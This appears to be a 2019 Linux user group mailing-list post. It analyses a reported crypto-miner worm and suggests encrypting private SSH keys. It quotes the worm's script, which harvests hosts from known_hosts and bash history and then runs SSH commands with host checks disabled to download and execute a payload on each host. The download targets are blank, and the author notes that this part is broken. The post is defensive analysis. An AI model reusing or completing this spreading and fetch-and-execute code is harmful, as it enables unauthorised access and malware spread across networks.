[kwlug-disc] SSH hygiene suggestion

Thu Jan 10 03:10:51 EST 2019

Dear KWLUG,

This is in response to these articles:
https://www.zdnet.com/article/new-linux-crypto-miner-steals-your-root-password-and-disables-your-antivirus/
https://www.itwire.com/security/85406-linux-malware-of-no-use-unless-it-gains-access-through-ssh.html
https://vms.drweb.com/virus/?i=17645163

I think the ZDNet article is lying when it says by omission that
malware on Linux is getting as bad as Windows, but that's not why I'm
here.  What I mean is, I think it is also lying when it says that it
spreads mostly via SSH, or even that it is indeed a worm.  "This SSH
self-spreading mechanism is believed to be the trojan's main  
distribution channel."

I have to go by second-hand reporting, but this malware will grep your
/root/.ssh/known_hosts and ~/.bash_history files for remote hosts and then
attempt to spread in them.  Here is the relevant (badly written) program:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o  
'[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >>  
/tmp/.h
cat /home/*/.bash_history|grep -o  
'[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >>  
/tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep  
-v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep  
-v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v  
/|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v  
/|sort -u >> /tmp/.h
cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
do
     (
         exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no  
`whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import  
urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r  
'\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f,  
implode(\"\", at file(\"''\")));fclose(\$f);';ruby -e \"require  
'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1|  
f1.read})}\";perl -MNet::FTP -e \"\\\$ftp =  
Net::FTP->new(\\\"\\\");\\\$ftp->login('',  
'');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755  
/tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &
     )
done

Thanks to Khalid Baheyeldin I know what AWK is doing and I understand
everything in the top half of that script.

The second half doesn't work at all. Despite using five tools to download
something it never specifies anything to download.  I have no idea why it's
there.  Is it a red herring, a distraction?

If it did specify something to download it wouldn't work because it tries to
download to /tmp/ as a file.  The author might know this if he didn't redirect
all output to /dev/null, but I guess that's one of the downsides of crime, you
can't get debugging output.

There are other problems with the script which make it less effective but this
mailing list is publicly-accessible and I don't want to debug it for the
criminal.

However, this worm or another like it *might* be written right one day, so I
have a suggestion.

It looks like this SSH worm can only spread if a) the use of authorized_keys
is in place and b) the private SSH key is not password-encrypted.  So, my
suggestion is, to the Linux world, please encrypt your private SSH key.  It
may also be a good idea not to run SSH servers on systems from which you also
run SSH clients, or maybe any servers on a client computer and vice versa.

I would also like to know why Dr. Web is not publishing the source code to
this virus.  My and others' security are concerned and this bugs me.  Is it
necessary and if so, why?  And can I get it as a concerned Linux user or do I
have to provide some information that I'm a serious security researcher?

...

"cat /tmp/.hh > /tmp/.h ; rm -rf /tmp/.hh" ?  He knows about AWK but not mv?

Tom